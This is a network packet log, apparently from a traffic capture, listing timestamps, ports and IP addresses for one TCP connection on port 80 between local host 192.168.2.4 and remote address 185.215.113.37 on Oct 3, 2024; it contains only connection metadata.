Oct 3, 2024 18:38:23.488389015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488394976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488423109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488436937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488459110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488467932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488492966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488501072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488528013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488538980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488560915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488575935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488595963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488605022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488631010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488641024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488666058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488677979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488701105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488711119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488734961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488749981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488768101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.488933086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488965988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.488992929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.489000082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.489008904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.489036083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.489054918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.489068985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.489082098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.489104033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.489136934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.489150047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.489170074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.489203930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.489236116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.489240885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.489284039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.489286900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.489320040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.489342928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.489353895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.489363909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.489389896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.489403963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.489434004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563160896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563230991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563256025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563262939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563280106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563299894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563304901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563354969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563410997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563410997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563451052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563462019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563484907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563510895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563519001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563535929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563550949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563569069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563586950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563601017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563637018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563640118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563674927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563690901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563708067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563730955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563740969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563755989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563775063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563793898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563810110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563826084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563843012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563858986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563879013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563899040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563915968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563931942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563954115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563965082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.563988924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.563999891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.564023018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.564035892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.564055920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.564066887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.564090014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.564100981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.564124107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.564136028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.564158916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.564193964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.564209938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.564239025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.564280987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.564308882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.564333916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.564343929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.564358950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.564388037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.573780060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.573815107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.573847055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.573848963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.573873043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.573895931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.573904037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.573936939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.573970079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.573983908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.574006081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.574017048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.574040890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.574052095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.574096918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.574109077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.574141026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.574156046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.574187994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.574203968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.574235916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.574253082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.574270010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.574281931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.574304104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.574318886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.574337006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.574351072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.574382067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.577208042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.577265024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.577265024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.577299118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.577321053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.577347040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.577351093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.577384949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.577399969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.577418089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.577438116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.577451944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.577471018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.577486038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.577524900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.577538013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.577600956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.577634096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.577655077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.577668905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.577680111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.577703953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.577713013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.577739000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.577755928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.577790976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.577850103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.577883005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.577908039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.577918053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.577929974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.577953100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.577966928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.577986956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578003883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578022003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578036070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578068018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578145981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578180075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578206062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578212023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578224897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578243017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578260899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578277111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578294039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578310966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578327894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578345060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578380108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578396082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578413963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578429937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578449965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578465939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578499079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578661919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578694105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578727961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578747988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578761101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578773975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578794956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578807116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578829050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578840017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578864098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578871965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578900099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578933001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578952074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578963041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.578979969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.578995943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579015017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579029083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579045057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579061985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579080105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579096079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579113007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579133034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579144001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579181910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579255104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579287052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579308987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579320908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579334021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579353094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579368114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579399109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579406977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579442024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579463959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579478025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579489946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579508066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579529047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579560995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579730034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579762936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579782963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579797029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579811096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579829931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579842091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579864025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579886913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579900980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579907894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.579935074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579967022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.579986095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.580001116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.580014944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.580033064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.580046892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.580066919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.580075026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.580100060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.580117941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.580133915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.580147982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.580167055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.580193043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.580199003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.580216885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.580231905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.580244064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.580265045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.580276012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.580298901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.580322981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.580333948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.580351114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.580368996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.580384970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.580406904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.580419064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.580440044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.580457926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.580491066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.654208899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654248953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654277086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.654285908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654289961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.654335022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.654345036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654382944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654416084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654428959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.654450893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654458046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.654493093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.654505968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654593945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654613018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.654628992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654645920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.654664040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654679060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.654699087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654714108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.654733896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654750109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.654774904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654786110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.654824972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.654870033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654906034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654925108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.654941082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654949903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.654974937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.654984951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.655020952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.655031919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.655054092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.655087948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.655102968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.655122042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.655141115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.655155897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.655167103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.655190945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.655213118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.655225039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.655241966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.655258894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.655265093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.655297995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.655306101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.655347109 CEST	49730	80	192.168.2.4	185.215.113.37
